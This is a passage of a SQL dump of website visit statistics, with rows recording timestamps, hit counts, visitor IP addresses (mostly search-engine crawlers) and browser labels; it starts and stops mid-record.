,0,0,'51.255.65.87','other'),(127461,1498771255,2,2,0,0,'91.209.11.236','other'),(127462,1498771477,1,1,0,0,'164.132.161.69','other'),(127463,1498771644,1,1,0,0,'164.132.161.78','other'),(127464,1498772232,1,1,0,0,'217.182.132.62','other'),(127465,1498773183,1,1,0,0,'51.255.65.55','other'),(127466,1498773243,1,1,0,0,'91.209.11.236','other'),(127467,1498773439,1,1,0,0,'8.29.198.27','other'),(127468,1498773535,1,1,0,0,'164.132.162.159','other'),(127469,1498774286,1,1,0,0,'164.132.161.29','other'),(127470,1498774628,1,0,1,0,'66.249.66.155',''),(127471,1498775559,1,0,1,0,'66.249.76.131',''),(127472,1498775636,1,1,0,0,'178.154.200.45','other'),(127473,1498775694,1,1,0,0,'178.154.200.60','other'),(127474,1498776060,1,1,0,0,'87.250.224.16','other'),(127475,1498776127,1,1,0,0,'95.108.213.8','other'),(127476,1498776147,1,0,1,0,'66.249.76.113',''),(127477,1498776158,1,1,0,0,'66.249.76.113','chrome'),(127478,1498776197,1,1,0,0,'141.8.132.39','other'),(127479,1498776325,1,0,1,0,'66.249.76.112',''),(127480,1498776637,1,1,0,0,'95.108.179.15','other'),(127481,1498776669,2,2,0,0,'95.108.213.34','other'),(127482,1498776741,1,1,0,0,'164.132.161.4','other'),(127483,1498776924,2,2,0,0,'87.250.224.18','other'),(127484,1498777190,2,2,0,0,'141.8.142.164','other'),(127485,1498777312,1,1,0,0,'141.8.142.38','other'),(127486,1498777430,2,2,0,0,'141.8.142.154','other'),(127487,1498777532,1,1,0,0,'164.132.161.62','other'),(127488,1498777604,1,1,0,0,'157.55.39.125','other'),(127489,1498777623,2,2,0,0,'95.108.213.34','other'),(127490,1498777703,1,1,0,0,'164.132.161.36','other'),(127491,1498778031,2,2,0,0,'46.229.168.68','other'),(127492,1498778048,3,3,0,0,'46.229.168.79','other'),(127493,1498778082,5,5,0,0,'46.229.168.70','other'),(127494,1498778085,1,1,0,0,'164.132.161.91','other'),(127495,1498778104,4,4,0,0,'46.229.168.77','other'),(127496,1498778121,4,4,0,0,'46.229.168.75','other'),(127497,1498778139,2,2,0,0,'46.229.168.72','other'),(127498,1498778165,1,1,0,0,'46.229.168.66','other'),(127499,1498778189,6,6,0,0,'46.229.168.76','other'),(127500,1498778193,1,1,0,0,'46.229.168.71','other'),(127501,1498778230,1,1,0,0,'46.229.168.65','other'),(127502,1498778266,2,2,0,0,'46.229.168.67','other'),(127503,1498778302,1,1,0,0,'46.229.168.80','other'),(127504,1498778347,1,1,0,0,'46.229.168.78','other'),(127505,1498778374,2,2,0,0,'46.229.168.69','other'),(127506,1498778695,1,1,0,0,'95.108.179.15','other'),(127507,1498778748,1,1,0,0,'51.255.65.27','other'),(127508,1498778880,2,2,0,0,'87.250.224.18','other'),(127509,1498778953,1,1,0,0,'51.255.65.24','other'),(127510,1498780085,4,4,0,0,'95.108.213.34','other'),(127511,1498780193,1,1,0,0,'51.255.65.13','other'),(127512,1498780394,1,1,0,0,'164.132.161.13','other'),(127513,1498780621,1,1,0,0,'51.255.65.26','other'),(127514,1498780948,2,2,0,0,'141.8.142.164','other'),(127515,1498781024,1,1,0,0,'217.182.132.186','other'),(127516,1498781133,2,2,0,0,'95.108.213.34','other'),(127517,1498781139,1,1,0,0,'51.255.65.59','other'),(127518,1498781260,1,1,0,0,'95.108.179.15','other'),(127519,1498781347,1,1,0,0,'216.244.66.237','other'),(127520,1498781376,2,2,0,0,'5.255.253.63','other'),(127521,1498781391,1,1,0,0,'164.132.162.158','other'),(127522,1498781429,1,1,0,0,'51.255.65.32','other'),(127523,1498781482,1,1,0,0,'95.108.213.7','other'),(127524,1498781642,1,1,0,0,'51.255.65.13','other'),(127525,1498781747,1,1,0,0,'164.132.161.52','other'),(127526,1498781967,2,2,0,0,'141.8.142.164','other'),(127527,1498782038,2,2,0,0,'141.8.142.154','other'),(127528,1498782180,7,7,0,0,'95.108.179.15','other'),(127529,1498782268,1,1,0,0,'5.255.253.58','other'),(127530,1498782269,1,1,0,0,'66.249.66.74','chrome'),(127531,1498782419,1,1,0,0,'91.209.11.236','other'),(127532,1498782656,1,1,0,0,'51.255.65.72','other'),(127533,1498782692,1,1,0,0,'95.108.213.7','other'),(127534,1498782936,2,2,0,0,'141.8.142.164','other'),(127535,1498783026,1,1,0,0,'87.250.224.18','other'),(127536,1498783073,1,1,0,0,'164.132.161.2','other'),(127537,1498783177,1,1,0,0,'95.108.213.34','other'),(127538,1498783231,1,1,0,0,'5.255.253.63','other'),(127539,1498783246,1,1,0,0,'93.158.152.79','other'),(127540,1498783274,2,2,0,0,'95.108.179.15','other'),(127541,1498783647,1,0,1,0,'68.180.230.48',''),(127542,1498783768,1,1,0,0,'51.255.65.18','other'),(127543,1498783805,1,1,0,0,'137.74.207.114','other'),(127544,1498783882,1,1,0,0,'217.182.132.241','other'),(127545,1498783965,1,1,0,0,'164.132.161.37','other'),(127546,1498784260,1,1,0,0,'8.29.198.25','other'),(127547,1498784282,1,1,0,0,'66.249.76.113','chrome'),(127548,1498784340,1,1,0,0,'164.132.161.82','other'),(127549,1498784356,1,1,0,0,'164.132.161.20','other'),(127550,1498785038,1,1,0,0,'217.182.132.55','other'),(127551,1498785229,1,1,0,0,'66.249.66.74','chrome'),(127552,1498785854,1,1,0,0,'217.182.132.157','other'),(127553,1498786128,1,1,0,0,'164.132.161.41','other'),(127554,1498786154,1,1,0,0,'217.182.132.30','other'),(127555,1498786367,1,1,0,0,'95.108.213.34','other'),(127556,1498787201,1,1,0,0,'217.182.132.14','other'),(127557,1498787764,1,1,0,0,'164.132.161.37','other'),(127558,1498787846,2,2,0,0,'141.8.142.154','other'),(127559,1498787870,1,1,0,0,'51.255.65.42','other'),(127560,1498788219,1,1,0,0,'164.132.161.27','other'),(127561,1498788309,1,1,0,0,'164.132.161.38','other'),(127562,1498789084,1,1,0,0,'46.161.9.55','firefox'),(127563,1498789194,1,1,0,0,'91.209.11.236','other'),(127564,1498790597,1,1,0,0,'51.255.65.22','other'),(127565,1498790618,1,1,0,0,'217.182.132.55','other'),(127566,1498790839,1,1,0,0,'5.255.253.63','other'),(127567,1498790995,1,1,0,0,'137.74.207.188','other'),(127568,1498791019,1,1,0,0,'51.255.65.38','other'),(127569,1498791570,1,1,0,0,'51.255.65.66','other'),(127570,1498792103,1,1,0,0,'51.255.65.37','other'),(127571,1498792157,1,1,0,0,'188.32.176.228','msie'),(127572,1498792581,3,3,0,0,'141.8.142.154','other'),(127573,1498792880,1,1,0,0,'46.188.106.212','msie'),(127574,1498793043,1,1,0,0,'37.204.66.49','msie'),(127575,1498793516,1,1,0,0,'141.8.142.154','other'),(127576,1498793709,1,1,0,0,'95.108.213.34','other'),(127577,1498793800,1,1,0,0,'95.108.179.15','other'),(127578,1498793857,1,1,0,0,'95.108.213.8','other'),(127579,1498793893,1,1,0,0,'51.255.65.42','other'),(127580,1498794054,1,1,0,0,'37.147.102.18','msie'),(127581,1498794137,1,1,0,0,'217.182.132.182','other'),(127582,1498794272,1,1,0,0,'91.209.11.236','other'),(127583,1498794277,1,1,0,0,'217.182.132.27','other'),(127584,1498794317,1,1,0,0,'109.63.230.87','msie'),(127585,1498794700,1,1,0,0,'217.182.132.186','other'),(127586,1498794982,2,2,0,0,'217.182.132.79','other'),(127587,1498795089,1,1,0,0,'8.29.198.27','other'),(127588,1498795399,4,4,0,0,'95.108.213.34','other'),(127589,1498795639,1,1,0,0,'141.8.142.154','other'),(127590,1498795869,1,1,0,0,'51.255.65.82','other'),(127591,1498796109,1,1,0,0,'164.132.161.25','other'),(127592,1498796305,3,3,0,0,'95.108.179.15','other'),(127593,1498796330,1,1,0,0,'51.255.71.119','other'),(127594,1498796445,1,1,0,0,'51.255.65.59','other'),(127595,1498796509,2,2,0,0,'95.108.213.34','other'),(127596,1498796575,2,2,0,0,'5.255.253.63','other'),(127597,1498796600,1,1,0,0,'217.182.132.56','other'),(127598,1498796656,2,1,1,0,'66.249.76.131',''),(127599,1498797521,2,0,2,0,'66.249.76.114',''),(127600,1498797529,1,1,0,0,'66.249.76.131','chrome'),(127601,1498797545,1,0,1,0,'66.249.76.112',''),(127602,1498797569,1,0,1,0,'66.249.76.137',''),(127603,1498797599,1,1,0,0,'164.132.161.38','other'),(127604,1498797663,1,1,0,0,'91.196.178.70','firefox'),(127605,1498797674,1,1,0,0,'46.48.13.161','chrome'),(127606,1498798194,1,1,0,0,'217.182.132.176','other'),(127607,1498798610,1,1,0,0,'87.250.224.18','other'),(127608,1498798819,1,1,0,0,'157.55.39.249','other'),(127609,1498798858,1,1,0,0,'95.108.179.15','other'),(127610,1498798861,1,1,0,0,'164.132.162.188','other'),(127611,1498798907,1,1,0,0,'164.132.161.75','other'),(127612,1498799071,1,1,0,0,'66.249.66.74','chrome'),(127613,1498799075,1,1,0,0,'217.182.132.53','other'),(127614,1498799097,2,2,0,0,'141.8.142.154','other'),(127615,1498799412,1,1,0,0,'217.182.132.147','other'),(127616,1498799540,1,1,0,0,'51.255.65.74','other'),(127617,1498799788,1,1,0,0,'51.255.65.8','other'),(127618,1498800168,1,1,0,0,'51.255.65.47','other'),(127619,1498800199,1,1,0,0,'95.108.213.34','other'),(127620,1498800395,1,1,0,0,'95.108.179.15','other'),(127621,1498800434,1,1,0,0,'51.255.65.82','other'),(127622,1498800619,1,1,0,0,'51.255.65.44','other'),(127623,1498800623,1,1,0,0,'151.80.27.118','other'),(127624,1498800785,1,1,0,0,'87.250.224.8','other'),(127625,1498800857,1,1,0,0,'164.132.161.80','other'),(127626,1498800955,1,1,0,0,'66.249.76.137','chrome'),(127627,1498801009,1,1,0,0,'95.108.213.8','other'),(127628,1498801352,1,1,0,0,'180.76.15.7','other'),(127629,1498801371,1,1,0,0,'217.182.132.66','other'),(127630,1498801381,1,1,0,0,'37.25.9.118','chrome'),(127631,1498801459,1,1,0,0,'51.255.65.38','other'),(127632,1498801476,1,1,0,0,'188.32.185.75','msie'),(127633,1498801510,1,1,0,0,'217.182.132.193','other'),(127634,1498801701,1,1,0,0,'87.250.224.7','other'),(127635,1498801851,2,2,0,0,'141.8.142.164','other'),(127636,1498802145,1,1,0,0,'95.108.179.15','other'),(127637,1498802337,1,1,0,0,'91.209.11.236','other'),(127638,1498802345,1,1,0,0,'5.164.121.169','msie'),(127639,1498802386,1,0,1,0,'66.249.76.114',''),(127640,1498802488,1,1,0,0,'51.255.65.30','other'),(127641,1498802648,1,1,0,0,'5.255.253.63','other'),(127642,1498802747,1,0,1,0,'66.249.66.155',''),(127643,1498802904,1,1,0,0,'5.255.253.58','other'),(127644,1498803023,1,1,0,0,'217.182.132.97','other'),(127645,1498803094,1,1,0,0,'178.95.247.243','firefox'),(127646,1498803113,1,1,0,0,'217.182.132.177','other'),(127647,1498803131,2,2,0,0,'141.8.142.154','other'),(127648,1498803154,1,0,1,0,'66.249.76.137',''),(127649,1498803528,1,1,0,0,'95.221.53.116','msie'),(127650,1498803537,1,1,0,0,'37.147.102.18','msie'),(127651,1498803607,1,1,0,0,'95.108.213.34','other'),(127652,1498803626,1,1,0,0,'51.255.65.51','other'),(127653,1498803726,1,1,0,0,'164.132.161.59','other'),(127654,1498803809,1,1,0,0,'178.154.200.37','other'),(127655,1498803858,1,1,0,0,'46.188.106.212','msie'),(127656,1498804029,1,1,0,0,'37.9.113.38','other'),(127657,1498804170,1,1,0,0,'164.132.161.46','other'),(127658,1498804266,1,1,0,0,'91.196.178.70','firefox'),(127659,1498804292,1,1,0,0,'141.8.142.154','other'),(127660,1498804570,1,1,0,0,'178.154.200.2','other'),(127661,1498804573,1,1,0,0,'93.158.152.79','other'),(127662,1498804820,2,2,0,0,'95.108.179.15','other'),(127663,1498805041,2,2,0,0,'178.154.200.45','other'),(127664,1498805390,1,1,0,0,'40.77.167.33','other'),(127665,1498805439,1,1,0,0,'141.8.142.97','other'),(127666,1498805485,1,1,0,0,'66.102.9.157','chrome'),(127667,1498805540,1,1,0,0,'141.8.132.72','other'),(127668,1498805630,1,1,0,0,'178.154.200.2','other'),(127669,1498805675,1,1,0,0,'164.132.161.28','other'),(127670,1498805695,1,1,0,0,'5.255.253.28','other'),(127671,1498805698,1,1,0,0,'141.8.142.91','other'),(127672,1498805916,1,1,0,0,'8.29.198.27','other'),(127673,1498806019,1,1,0,0,'51.255.65.57','other'),(127674,1498806038,1,1,0,0,'91.196.178.70','chrome'),(127675,1498806228,1,1,0,0,'87.250.224.18','other'),(127676,1498806301,1,1,0,0,'95.108.213.7','other'),(127677,1498806377,1,1,0,0,'46.161.9.55','chrome'),(127678,1498806440,1,1,0,0,'217.182.132.183','other'),(127679,1498806506,2,2,0,0,'141.8.142.164','other'),(127680,1498806597,1,1,0,0,'85.114.208.223','firefox'),(127681,1498806676,1,1,0,0,'217.182.132.71','other'),(127682,1498806697,1,1,0,0,'92.113.4.211','chrome'),(127683,1498806837,1,0,1,0,'66.249.76.137',''),(127684,1498806848,1,1,0,0,'95.108.213.34','other'),(127685,1498806965,1,1,0,0,'37.73.217.117','chrome'),(127686,1498807011,1,1,0,0,'91.196.178.70','chrome'),(127687,1498807117,1,0,1,0,'66.249.66.156',''),(127688,1498807206,1,1,0,0,'37.54.23.135','chrome'),(127689,1498807213,1,1,0,0,'5.255.253.28','other'),(127690,1498807515,1,1,0,0,'141.8.142.164','other'),(127691,1498807551,1,1,0,0,'217.182.132.64','other'),(127692,1498807580,1,1,0,0,'217.182.132.32','other'),(127693,1498807615,1,1,0,0,'164.132.161.37','other'),(127694,1498807702,2,2,0,0,'95.108.179.15','other'),(127695,1498807777,1,1,0,0,'91.196.177.15','chrome'),(127696,1498807835,1,1,0,0,'164.132.161.80','other'),(127697,1498807902,1,0,1,0,'66.249.76.137',''),(127698,1498808338,1,1,0,0,'137.74.207.188','other'),(127699,1498808370,1,1,0,0,'137.74.207.164','other'),(127700,1498808587,1,1,0,0,'51.255.65.35','other'),(127701,1498808787,1,1,0,0,'217.182.132.97','other'),(127702,1498808831,1,1,0,0,'217.182.132.56','other'),(127703,1498809644,1,1,0,0,'95.132.61.217','firefox'),(127704,1498809768,1,1,0,0,'216.244.66.237','other'),(127705,1498810131,1,1,0,0,'164.132.161.88','other'),(127706,1498810230,1,1,0,0,'164.132.161.44','other'),(127707,1498810499,1,0,1,0,'66.249.66.156',''),(127708,1498810702,1,1,0,0,'92.112.109.230','chrome'),(127709,1498811204,1,1,0,0,'51.255.65.36','other'),(127710,1498811988,1,1,0,0,'51.255.71.120','other'),(127711,1498812098,1,1,0,0,'51.255.71.116','other'),(127712,1498812372,1,1,0,0,'51.255.65.29','other'),(127713,1498812569,1,1,0,0,'46.165.197.142','other'),(127714,1498812738,1,0,1,0,'68.180.230.48',''),(127715,1498813157,1,1,0,0,'51.255.65.75','other'),(127716,1498813175,1,1,0,0,'51.255.71.115','other'),(127717,1498813612,1,1,0,0,'51.255.65.14','other'),(127718,1498814090,1,1,0,0,'51.255.65.73','other'),(127719,1498814188,1,0,1,0,'66.249.66.74',''),(127720,1498814548,1,1,0,0,'51.255.71.101','other'),(127721,1498814659,1,1,0,0,'164.132.161.69','other'),(127722,1498814757,1,1,0,0,'51.255.65.71','other'),(127723,1498815290,1,1,0,0,'217.182.132.157','other'),(127724,1498815365,1,0,1,0,'66.249.76.137',''),(127725,1498815561,1,0,1,0,'66.249.76.113',''),(127726,1498815568,1,1,0,0,'66.249.76.113','chrome'),(127727,1498815788,1,1,0,0,'51.255.65.62','other'),(127728,1498816131,1,1,0,0,'164.132.161.29','other'),(127729,1498816347,1,1,0,0,'51.255.65.69','other'),(127730,1498816737,1,1,0,0,'8.29.198.25','other'),(127731,1498818540,1,1,0,0,'164.132.161.73','other'),(127732,1498818624,1,1,0,0,'164.132.161.9','other'),(127733,1498818638,1,1,0,0,'217.182.132.171','other'),(127734,1498819096,1,1,0,0,'164.132.161.60','other'),(127735,1498820142,1,1,0,0,'217.182.132.176','other'),(127736,1498820225,1,1,0,0,'95.134.220.231','chrome'),(127737,1498820785,1,0,1,0,'66.249.66.157',''),(127738,1498821238,2,2,0,0,'157.55.39.156','other'),(127739,1498821433,1,1,0,0,'164.132.161.18','other'),(127740,1498821703,1,0,1,0,'66.249.76.112',''),(127741,1498821713,1,1,0,0,'217.182.132.152','other'),(127742,1498821813,1,1,0,0,'164.132.161.56','other'),(127743,1498821987,1,1,0,0,'217.182.132.52','other'),(127744,1498822002,1,0,1,0,'66.249.66.157',''),(127745,1498823099,1,1,0,0,'51.255.65.11','other'),(127746,1498823296,1,1,0,0,'151.80.27.118','other'),(127747,1498823449,1,1,0,0,'217.182.132.67','other'),(127748,1498823958,1,1,0,0,'51.255.65.23','other'),(127749,1498824248,1,1,0,0,'217.182.132.90','other'),(127750,1498824576,1,1,0,0,'95.132.61.217','firefox'),(127751,1498824613,1,1,0,0,'217.182.132.149','other'),(127752,1498824799,1,1,0,0,'207.46.13.140','other'),(127753,1498824879,1,1,0,0,'51.255.65.54','other'),(127754,1498825537,1,0,1,0,'66.249.76.112',''),(127755,1498825578,1,1,0,0,'164.132.161.42','other'),(127756,1498825702,1,1,0,0,'217.182.132.183','other'),(127757,1498825996,1,1,0,0,'51.255.65.84','other'),(127758,1498826030,1,1,0,0,'51.255.65.52','other'),(127759,1498826167,1,1,0,0,'207.46.13.140','other'),(127760,1498826523,1,1,0,0,'51.255.65.33','other'),(127761,1498826792,1,1,0,0,'51.255.65.59','other'),(127762,1498827323,1,1,0,0,'217.182.132.153','other'),(127763,1498827567,1,1,0,0,'8.29.198.25','other'),(127764,1498828491,1,1,0,0,'137.74.207.108','other'),(127765,1498828871,1,1,0,0,'217.182.132.157','other'),(127766,1498829236,1,1,0,0,'164.132.161.93','other'),(127767,1498829442,3,3,0,0,'91.196.178.166','chrome'),(127768,1498829466,1,1,0,0,'51.255.71.101','other'),(127769,1498829731,1,1,0,0,'51.255.65.89','other'),(127770,1498830336,1,1,0,0,'217.182.132.21','other'),(127771,1498830584,1,1,0,0,'66.249.76.137','chrome'),(127772,1498830641,1,1,0,0,'66.249.76.113','chrome'),(127773,1498830859,1,1,0,0,'66.249.66.74','chrome'),(127774,1498831059,1,1,0,0,'91.196.178.166','chrome'),(127775,1498831281,1,0,1,0,'66.249.76.107',''),(127776,1498831288,1,1,0,0,'40.77.167.23','other'),(127777,1498831953,1,1,0,0,'157.55.39.156','other'),(127778,1498833033,1,1,0,0,'51.255.65.70','other'),(127779,1498833152,1,1,0,0,'217.182.132.86','other'),(127780,1498833520,1,1,0,0,'66.249.76.107','chrome'),(127781,1498834278,1,1,0,0,'217.182.132.73','other'),(127782,1498834476,1,0,1,0,'66.249.76.108',''),(127783,1498834588,1,1,0,0,'217.182.132.179','other'),(127784,1498835687,1,1,0,0,'95.132.103.77','firefox'),(127785,1498836035,1,1,0,0,'157.55.39.156','other'),(127786,1498836601,1,1,0,0,'217.182.132.66','other'),(127787,1498836681,1,0,1,0,'66.249.66.156',''),(127788,1498837366,1,1,0,0,'51.255.65.59','other'),(127789,1498837491,1,0,1,0,'66.249.76.108',''),(127790,1498837830,1,1,0,0,'217.182.132.153','other'),(127791,1498837844,1,1,0,0,'51.255.71.119','other'),(127792,1498838107,1,1,0,0,'178.154.189.14','other'),(127793,1498838134,1,1,0,0,'95.108.181.13','other'),(127794,1498838149,1,1,0,0,'141.8.132.72','other'),(127795,1498838283,2,2,0,0,'5.255.253.83','other'),(127796,1498838359,1,1,0,0,'217.182.132.86','other'),(127797,1498838387,1,1,0,0,'8.29.198.26','other'),(127798,1498838504,1,1,0,0,'208.43.225.84','other'),(127799,1498838607,1,1,0,0,'217.69.133.9','other'),(127800,1498838635,1,0,1,0,'68.180.230.48',''),(127801,1498838706,1,1,0,0,'164.132.162.157','other'),(127802,1498838802,1,1,0,0,'5.255.253.28','other'),(127803,1498839168,1,1,0,0,'164.132.162.164','other'),(127804,1498839277,2,2,0,0,'95.108.213.34','other'),(127805,1498839288,3,3,0,0,'141.8.142.154','other'),(127806,1498839399,1,1,0,0,'188.32.7.26','msie'),(127807,1498839581,1,0,1,0,'66.249.76.109',''),(127808,1498839701,2,2,0,0,'95.108.179.15','other'),(127809,1498839730,1,1,0,0,'217.182.132.72','other'),(127810,1498839767,1,1,0,0,'51.255.65.23','other'),(127811,1498839825,1,1,0,0,'93.158.152.77','other'),(127812,1498839855,1,1,0,0,'87.250.224.16','other'),(127813,1498839859,2,2,0,0,'141.8.142.164','other'),(127814,1498840091,1,1,0,0,'95.108.213.7','other'),(127815,1498840098,1,1,0,0,'141.8.132.25','other'),(127816,1498840129,1,1,0,0,'51.255.71.132','other'),(127817,1498840321,2,2,0,0,'95.108.213.34','other'),(127818,1498840647,1,1,0,0,'51.255.71.121','other'),(127819,1498840781,1,1,0,0,'217.182.132.51','other'),(127820,1498840968,1,1,0,0,'217.182.132.59','other'),(127821,1498840992,1,1,0,0,'178.92.251.26','chrome'),(127822,1498841109,1,1,0,0,'95.108.213.7','other'),(127823,1498841272,1,1,0,0,'141.8.142.154','other'),(127824,1498841460,3,3,0,0,'54.165.59.7','other'),(127825,1498841757,1,1,0,0,'217.182.132.150','other'),(127826,1498841791,1,1,0,0,'93.158.152.79','other'),(127827,1498841917,2,2,0,0,'5.255.253.58','other'),(127828,1498842082,1,1,0,0,'178.154.149.1','other'),(127829,1498842109,2,2,0,0,'95.108.213.34','other'),(127830,1498842318,2,2,0,0,'141.8.142.154','other'),(127831,1498842373,1,1,0,0,'217.182.132.97','other'),(127832,1498842398,5,5,0,0,'54.165.59.7','other'),(127833,1498842446,1,1,0,0,'164.132.161.54','other'),(127834,1498842654,2,2,0,0,'141.8.142.164','other'),(127835,1498843072,3,3,0,0,'178.154.200.37','other'),(127836,1498843105,1,1,0,0,'5.255.253.28','other'),(127837,1498843160,1,1,0,0,'95.108.213.7','other'),(127838,1498843282,1,1,0,0,'66.249.76.107','chrome'),(127839,1498843310,3,3,0,0,'54.165.59.7','other'),(127840,1498843368,3,3,0,0,'141.8.142.38','other'),(127841,1498843378,5,5,0,0,'95.108.179.15','other'),(127842,1498843385,1,1,0,0,'141.8.142.154','other'),(127843,1498843571,1,1,0,0,'87.250.224.8','other'),(127844,1498843581,1,1,0,0,'87.250.224.16','other'),(127845,1498843590,1,1,0,0,'95.108.213.32','other'),(127846,1498843663,1,0,1,0,'66.249.76.91',''),(127847,1498843833,1,0,1,0,'66.249.76.93',''),(127848,1498843951,1,1,0,0,'217.69.133.9','other'),(127849,1498844090,1,1,0,0,'5.255.253.81','other'),(127850,1498844099,1,1,0,0,'95.108.213.7','other'),(127851,1498844107,4,4,0,0,'141.8.142.164','other'),(127852,1498844123,1,1,0,0,'95.108.213.34','other'),(127853,1498844145,2,2,0,0,'5.255.253.63','other'),(127854,1498844276,1,1,0,0,'217.182.132.97','other'),(127855,1498844301,1,1,0,0,'95.108.181.13','other'),(127856,1498844319,3,3,0,0,'178.154.200.45','other'),(127857,1498844334,1,1,0,0,'87.250.224.7','other'),(127858,1498844487,1,1,0,0,'141.8.142.154','other'),(127859,1498844495,1,1,0,0,'178.154.149.3','other'),(127860,1498844497,1,1,0,0,'141.8.132.25','other'),(127861,1498844500,1,1,0,0,'141.8.142.38','other'),(127862,1498844504,1,1,0,0,'87.250.224.18','other'),(127863,1498844538,1,1,0,0,'157.55.39.156','other'),(127864,1498844656,1,1,0,0,'137.74.207.110','other'),(127865,1498844729,1,1,0,0,'180.76.15.31','other'),(127866,1498845073,1,0,1,0,'66.249.66.75',''),(127867,1498845088,1,1,0,0,'66.249.66.75','chrome'),(127868,1498845299,1,1,0,0,'95.108.179.15','other'),(127869,1498845323,1,1,0,0,'66.249.76.91','chrome'),(127870,1498845618,1,1,0,0,'217.182.132.177','other'),(127871,1498845624,1,1,0,0,'217.182.132.97','other'),(127872,1498846072,1,1,0,0,'5.255.253.81','other'),(127873,1498846203,1,1,0,0,'95.108.213.7','other'),(127874,1498846288,1,1,0,0,'141.8.142.38','other'),(127875,1498847191,1,1,0,0,'164.132.161.62','other'),(127876,1498847303,1,1,0,0,'51.255.65.14','other'),(127877,1498847341,1,1,0,0,'157.55.39.156','other'),(127878,1498847481,1,1,0,0,'164.132.162.156','other'),(127879,1498847646,1,0,1,0,'66.249.76.108',''),(127880,1498848882,1,1,0,0,'51.255.65.61','other'),(127881,1498849212,1,1,0,0,'8.29.198.27','other'),(127882,1498849451,1,0,1,0,'68.180.230.48',''),(127883,1498849578,1,1,0,0,'141.8.142.42','other'),(127884,1498849580,1,1,0,0,'178.154.189.29','other'),(127885,1498849627,1,1,0,0,'95.108.179.15','other'),(127886,1498849673,2,2,0,0,'141.8.142.154','other'),(127887,1498849739,1,1,0,0,'51.255.65.96','other'),(127888,1498849801,1,1,0,0,'5.255.253.81','other'),(127889,1498850021,1,1,0,0,'164.132.161.22','other'),(127890,1498850046,1,1,0,0,'178.154.189.3','other'),(127891,1498850216,1,1,0,0,'141.8.132.25','other'),(127892,1498850256,1,1,0,0,'141.8.142.97','other'),(127893,1498850625,1,1,0,0,'217.182.132.152','other'),(127894,1498850782,2,2,0,0,'5.255.253.63','other'),(127895,1498850863,1,1,0,0,'66.249.76.91','chrome'),(127896,1498850866,1,1,0,0,'95.108.179.15','other'),(127897,1498850936,1,1,0,0,'141.8.132.39','other'),(127898,1498850943,1,1,0,0,'95.108.213.34','other'),(127899,1498851003,1,1,0,0,'91.196.178.162','chrome'),(127900,1498851542,1,1,0,0,'141.8.142.154','other'),(127901,1498851651,1,1,0,0,'141.8.142.164','other'),(127902,1498851653,1,1,0,0,'46.242.63.143','msie'),(127903,1498851736,1,1,0,0,'217.182.132.4','other'),(127904,1498851749,1,1,0,0,'164.132.161.81','other'),(127905,1498851923,2,2,0,0,'178.154.149.3','other'),(127906,1498851929,1,1,0,0,'141.8.132.25','other'),(127907,1498852573,1,1,0,0,'137.74.207.188','other'),(127908,1498852748,1,1,0,0,'164.132.161.49','other'),(127909,1498853052,1,1,0,0,'5.255.253.63','other'),(127910,1498853360,1,1,0,0,'51.255.65.35','other'),(127911,1498853381,2,2,0,0,'51.255.65.82','other'),(127912,1498853603,1,1,0,0,'51.255.65.58','other'),(127913,1498853802,1,1,0,0,'164.132.161.76','other'),(127914,1498854019,1,1,0,0,'51.255.71.120','other'),(127915,1498854451,1,1,0,0,'164.132.161.11','other'),(127916,1498854770,2,2,0,0,'141.8.142.164','other'),(127917,1498855011,1,1,0,0,'95.108.179.15','other'),(127918,1498855065,1,1,0,0,'141.8.142.38','other'),(127919,1498855086,1,1,0,0,'217.182.132.23','other'),(127920,1498855121,1,1,0,0,'164.132.161.44','other'),(127921,1498855354,1,1,0,0,'51.255.65.43','other'),(127922,1498855553,1,1,0,0,'178.154.149.1','other'),(127923,1498855656,1,1,0,0,'164.132.161.61','other'),(127924,1498855877,31,31,0,0,'23.20.194.116','other'),(127925,1498855923,1,1,0,0,'95.108.213.34','other'),(127926,1498855979,1,1,0,0,'178.154.149.3','other'),(127927,1498855992,2,2,0,0,'87.250.224.18','other'),(127928,1498856150,1,1,0,0,'51.255.65.74','other'),(127929,1498856242,1,1,0,0,'141.8.142.164','other'),(127930,1498856620,1,1,0,0,'217.182.132.27','other'),(127931,1498856947,1,1,0,0,'51.255.64.106','other'),(127932,1498857181,1,1,0,0,'217.182.132.146','other'),(127933,1498857879,1,1,0,0,'141.8.142.38','other'),(127934,1498857889,1,1,0,0,'87.250.224.16','other'),(127935,1498858213,1,0,1,0,'68.180.230.48',''),(127936,1498858337,1,1,0,0,'217.182.132.68','other'),(127937,1498858459,1,1,0,0,'91.209.11.236','other'),(127938,1498858532,1,1,0,0,'66.249.76.91','chrome'),(127939,1498858564,1,1,0,0,'95.108.213.34','other'),(127940,1498858565,1,1,0,0,'217.182.132.181','other'),(127941,1498858631,1,1,0,0,'66.249.66.156','chrome'),(127942,1498858839,1,1,0,0,'217.182.132.82','other'),(127943,1498859954,1,1,0,0,'207.46.13.140','other'),(127944,1498860021,1,1,0,0,'51.255.65.19','other'),(127945,1498860036,1,1,0,0,'8.29.198.27','other'),(127946,1498860150,1,1,0,0,'217.182.132.84','other'),(127947,1498860432,1,1,0,0,'164.132.161.10','other'),(127948,1498860487,1,1,0,0,'217.69.133.4','other'),(127949,1498861131,1,1,0,0,'51.255.71.98','other'),(127950,1498861275,1,1,0,0,'51.255.65.75','other'),(127951,1498861420,1,0,1,0,'66.249.76.107',''),(127952,1498861566,1,1,0,0,'91.209.11.236','other'),(127953,1498862090,1,1,0,0,'217.182.132.62','other'),(127954,1498863070,1,1,0,0,'217.182.132.88','other'),(127955,1498863175,1,1,0,0,'217.182.132.85','other'),(127956,1498863210,1,1,0,0,'164.132.161.57','other'),(127957,1498863453,1,1,0,0,'217.182.132.30','other'),(127958,1498863486,1,1,0,0,'217.182.132.80','other'),(127959,1498863530,1,1,0,0,'95.108.179.15','other'),(127960,1498863607,4,4,0,0,'95.108.213.34','other'),(127961,1498863661,1,1,0,0,'51.255.71.129','other'),(127962,1498863777,1,1,0,0,'51.255.65.38','other'),(127963,1498863866,1,1,0,0,'95.108.213.7','other'),(127964,1498863898,1,1,0,0,'5.255.253.58','other'),(127965,1498864124,2,2,0,0,'87.250.224.18','other'),(127966,1498864223,1,1,0,0,'164.132.161.64','other'),(127967,1498864557,1,1,0,0,'178.154.200.37','other'),(127968,1498864672,1,1,0,0,'178.154.149.3','other'),(127969,1498864675,1,1,0,0,'87.250.224.24','other'),(127970,1498864758,1,1,0,0,'141.8.142.164','other'),(127971,1498864780,1,1,0,0,'5.255.253.81','other'),(127972,1498864781,1,1,0,0,'188.32.176.228','msie'),(127973,1498864817,1,1,0,0,'51.255.65.25','other'),(127974,1498864855,1,1,0,0,'51.255.65.52','other'),(127975,1498866011,1,1,0,0,